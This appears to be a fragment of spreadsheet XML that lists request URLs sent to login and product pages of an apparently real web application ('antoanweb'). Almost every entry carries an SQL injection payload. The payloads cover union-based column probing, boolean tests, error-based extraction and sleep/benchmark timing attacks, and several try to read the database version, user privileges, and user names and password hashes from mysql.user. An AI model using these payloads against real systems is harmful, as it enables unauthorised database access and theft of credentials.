  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'iixo'='iixo&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'bumu'='bumu&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'mklw'='mklw&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'mebk'='mebk&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'ukqe'='ukqe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--and'gdmq'='gdmq&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect9285,9285,9285,9285,9285,9285,9285,9285,9285,9285,9285,9285,9285,9285,9285,9285,9285,9285,9285,9285,9285--and'lmyl'='lmyl&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838--and'ybus'='ybus&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601,1601--and'jjym'='jjym&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687--and'mapb'='mapb&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147,5147--and'ylbi'='ylbi&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284,5284--and'huev'='huev&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106,5106--and'qqqh'='qqqh&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828--and'ujuz'='ujuz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391,6391--and'wygf'='wygf&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371--and'wwvu'='wwvu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--and'tzxc'='tzxc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--and'fqsy'='fqsy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--and'czpy'='czpy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--and'thfx'='thfx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--and'whzm'='whzm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--and'lkad'='lkad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--and'poii'='poii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--and'fvpu'='fvpu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--and'ctep'='ctep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--and'twuf'='twuf&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378,3378--and'pybi'='pybi&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133,8133--and'nbmp'='nbmp&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701,701--and'sdal'='sdal&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27--and'yall'='yall&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206--and'mxnk'='mxnk&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574,2574--and'fjpa'='fjpa&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704,1704--and'dnzy'='dnzy&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413--and'yqgt'='yqgt&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650,1650--and'magd'='magd&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612--and'zlgz'='zlgz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--and'gbwd'='gbwd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--and'sdsc'='sdsc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--and'elrz'='elrz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--and'kkhy'='kkhy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--and'wfcc'='wfcc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--and'iwcy'='iwcy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,null--and'gior'='gior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,null,null--and'pbag'='pbag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,null,null,null--and'vqqz'='vqqz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'aywp'='aywp&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597--and'dcfa'='dcfa&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249,6249--and'eppi'='eppi&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817,2817--and'tebe'='tebe&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62--and'thml'='thml&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051--and'knhg'='knhg&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525,7525--and'zmpa'='zmpa&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803,5803--and'jsik'='jsik&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906--and'tmrc'='tmrc&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839--and'dmgo'='dmgo&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142,5142--and'bvtt'='bvtt&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-7757'or(select2001from(selectcount(*),concat(char(58,116,105,106,58),(mid((ifnull(cast(version()aschar),char(32))),1,50)),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'rkul'='rkul&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-1285'or(select3817from(selectcount(*),concat(char(58,116,105,106,58),(mid((ifnull(cast(current_user()aschar),char(32))),1,50)),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'pvok'='pvok&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-7046'or(select7496from(selectcount(*),concat(char(58,116,105,106,58),(mid((ifnull(cast(database()aschar),char(32))),1,50)),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'uuoj'='uuoj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-8605'or(select5264from(selectcount(*),concat(char(58,116,105,106,58),(selectmid(((casewhen((selectsuper_privfrommysql.userwhereuser=char(116,105,101,110,100,97)limit0,1)=char(89))then1else0end)),1,50)),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'wyur'='wyur&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-8076'or(select4147from(selectcount(*),concat(char(58,116,105,106,58),(selectmid((ifnull(cast(count(*)aschar),char(32))),1,50)frominformation_schema.user_privileges),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'sfkx'='sfkx&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-7799'or(select1056from(selectcount(*),concat(char(58,116,105,106,58),(selectmid((ifnull(cast(granteeaschar),char(32))),1,50)frominformation_schema.user_privilegeslimit0,1),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'ryow'='ryow&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-3494'or(select1588from(selectcount(*),concat(char(58,116,105,106,58),(selectmid((ifnull(cast(count(*)aschar),char(32))),1,50)frommysql.user),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'xdst'='xdst&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-6209'or(select8893from(selectcount(*),concat(char(58,116,105,106,58),(selectmid((ifnull(cast(useraschar),char(32))),1,50)frommysql.userlimit0,1),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'kary'='kary&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-4405'or(select763from(selectcount(*),concat(char(58,116,105,106,58),(selectmid((ifnull(cast(passwordaschar),char(32))),1,50)frommysql.userlimit0,1),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'iibj'='iibj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-4249'or(select6197from(selectcount(*),concat(char(58,116,105,106,58),(selectmid((ifnull(cast(count(*)aschar),char(32))),1,50)frominformation_schema.user_privileges),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'ifzz'='ifzz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-5141'or(select8319from(selectcount(*),concat(char(58,116,105,106,58),(selectmid((ifnull(cast(granteeaschar),char(32))),1,50)frominformation_schema.user_privilegeslimit0,1),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'ewtu'='ewtu&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-9958'ornot(ord(mid((selectifnull(cast(count(distinct(password))aschar),char(32))frommysql.userwhereuser=char(116,105,101,110,100,97)),1,1))&gt;51)and'vrhb'='vrhb&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-9958'ornot(ord(mid((selectifnull(cast(count(distinct(password))aschar),char(32))frommysql.userwhereuser=char(116,105,101,110,100,97)),1,1))&gt;48)and'vrhb'='vrhb&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-9958'ornot(ord(mid((selectifnull(cast(count(distinct(password))aschar),char(32))frommysql.userwhereuser=char(116,105,101,110,100,97)),1,1))&gt;1)and'vrhb'='vrhb&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=d'z"0&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-2778'or(select7446from(selectcount(*),concat(char(58,101,115,111,58),(selectmid((ifnull(cast(count(*)aschar),char(32))),1,50)frommysql.user),char(58,111,114,119,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'kjhl'='kjhl&amp;pwd=d'z"0&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-3038'ornot(ord(mid((selectifnull(cast(count(distinct(password))aschar),char(32))frommysql.userwhereuser=char(116,105,101,110,100,97)),1,1))&gt;51)and'bpky'='bpky&amp;pwd=d'z"0&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-3038'ornot(ord(mid((selectifnull(cast(count(distinct(password))aschar),char(32))frommysql.userwhereuser=char(116,105,101,110,100,97)),1,1))&gt;48)and'bpky'='bpky&amp;pwd=d'z"0&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-3038'ornot(ord(mid((selectifnull(cast(count(distinct(password))aschar),char(32))frommysql.userwhereuser=char(116,105,101,110,100,97)),1,1))&gt;1)and'bpky'='bpky&amp;pwd=d'z"0&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0)()"'')''(</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0)and1371=286</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0)and691=691</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0)and5347=1254</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and9735=620</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and691=691</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and422=8333</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0'and4471=3762</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0'and691=691</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0'and8353=5174</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0"and6292=3939</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0"and691=691</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0"and1677=1640</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0)and2101=8528and(5263=5263</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0)and691=691and(8888=8888</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0)and9812=6154and(5727=5727</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0))and9201=7382and((8474=8474</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0))and691=691and((1658=1658</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0))and2729=7530and((2656=2656</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0)))and8724=107and(((8341=8341</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0)))and691=691and(((8881=8881</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0and5646=3157</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0and691=691</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0and258=1999</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and4617=5469and('lwir'='lwir</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and691=691and('jlcw'='jlcw</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and8457=5550and('phdc'='phdc</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0'))and4668=7960and(('ahtp'='ahtp</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0'))and691=691and(('wszo'='wszo</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0'))and6171=3660and(('xnva'='xnva</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')))and7193=8100and((('ptir'='ptir</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')))and691=691and((('ngtv'='ngtv</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')))and4570=7607and((('zevg'='zevg</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0'and9504=2820and'bkgk'='bkgk</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0'and691=691and'pxbt'='pxbt</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0'and3068=3554and'nymd'='nymd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and9600=76and('owbu'like'owbu</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and691=691and('zxvc'like'zxvc</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and6754=7648and('nnqx'like'nnqx</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and(select2380from(selectcount(*),concat(char(58,99,106,117,58),(select(casewhen(2380=2380)then1else0end)),char(58,120,112,106,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and('vqtc'like'vqtc</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')androw(3150,8683)&gt;(selectcount(*),concat(char(58,99,106,117,58),(select(casewhen(3150=3150)then1else0end)),char(58,120,112,106,58),floor(rand(0)*2))xfrom(select3150unionselect8683)agroupbyxlimit1)and('zxfb'like'zxfb</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=-9839')or(select7225from(selectcount(*),concat(char(58,99,106,117,58),(select(casewhen(7225=7225)then1else0end)),char(58,120,112,106,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and('mpub'like'mpub</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=-734')orrow(9873,5572)&gt;(selectcount(*),concat(char(58,99,106,117,58),(select(casewhen(9873=9873)then1else0end)),char(58,120,112,106,58),floor(rand(0)*2))xfrom(select9873unionselect5572)agroupbyxlimit1)and('wrpj'like'wrpj</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=-2123')or1groupbyconcat(char(58,99,106,117,58),(select(casewhen(6239=6239)then1else0end)),char(58,120,112,106,58),floor(rand(0)*2))havingmin(0)--and('zvpy'like'zvpy</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0');selectsleep(5);--and('gcig'like'gcig</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0');selectbenchmark(5000000,md5(char(122,88,83,77)));--and('gcri'like'gcri</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')andsleep(5)and('cljb'like'cljb</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')andsleep(5)--and('hmgz'like'hmgz</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and4072=benchmark(5000000,md5(char(78,105,79,97)))and('vxvg'like'vxvg</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and66=benchmark(5000000,md5(char(121,66,119,79)))--and('kurf'like'kurf</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=-9097')or9410=sleep(5)and('dwgv'like'dwgv</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=-5064')or2177=benchmark(5000000,md5(char(116,85,122,116)))and('tfia'like'tfia</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull#and('wbbe'like'wbbe</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null#and('qjrm'like'qjrm</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null#and('qdtb'like'qdtb</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null#and('bxha'like'bxha</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null#and('xtsw'like'xtsw</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null#and('rdjw'like'rdjw</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null#and('vdjg'like'vdjg</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null#and('efev'like'efev</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null#and('ursj'like'ursj</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null#and('jizi'like'jizi</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8722#and('shul'like'shul</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8377,8377#and('mqcc'like'mqcc</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect3222,3222,3222#and('xgbz'like'xgbz</t>
  </si>
  <si>
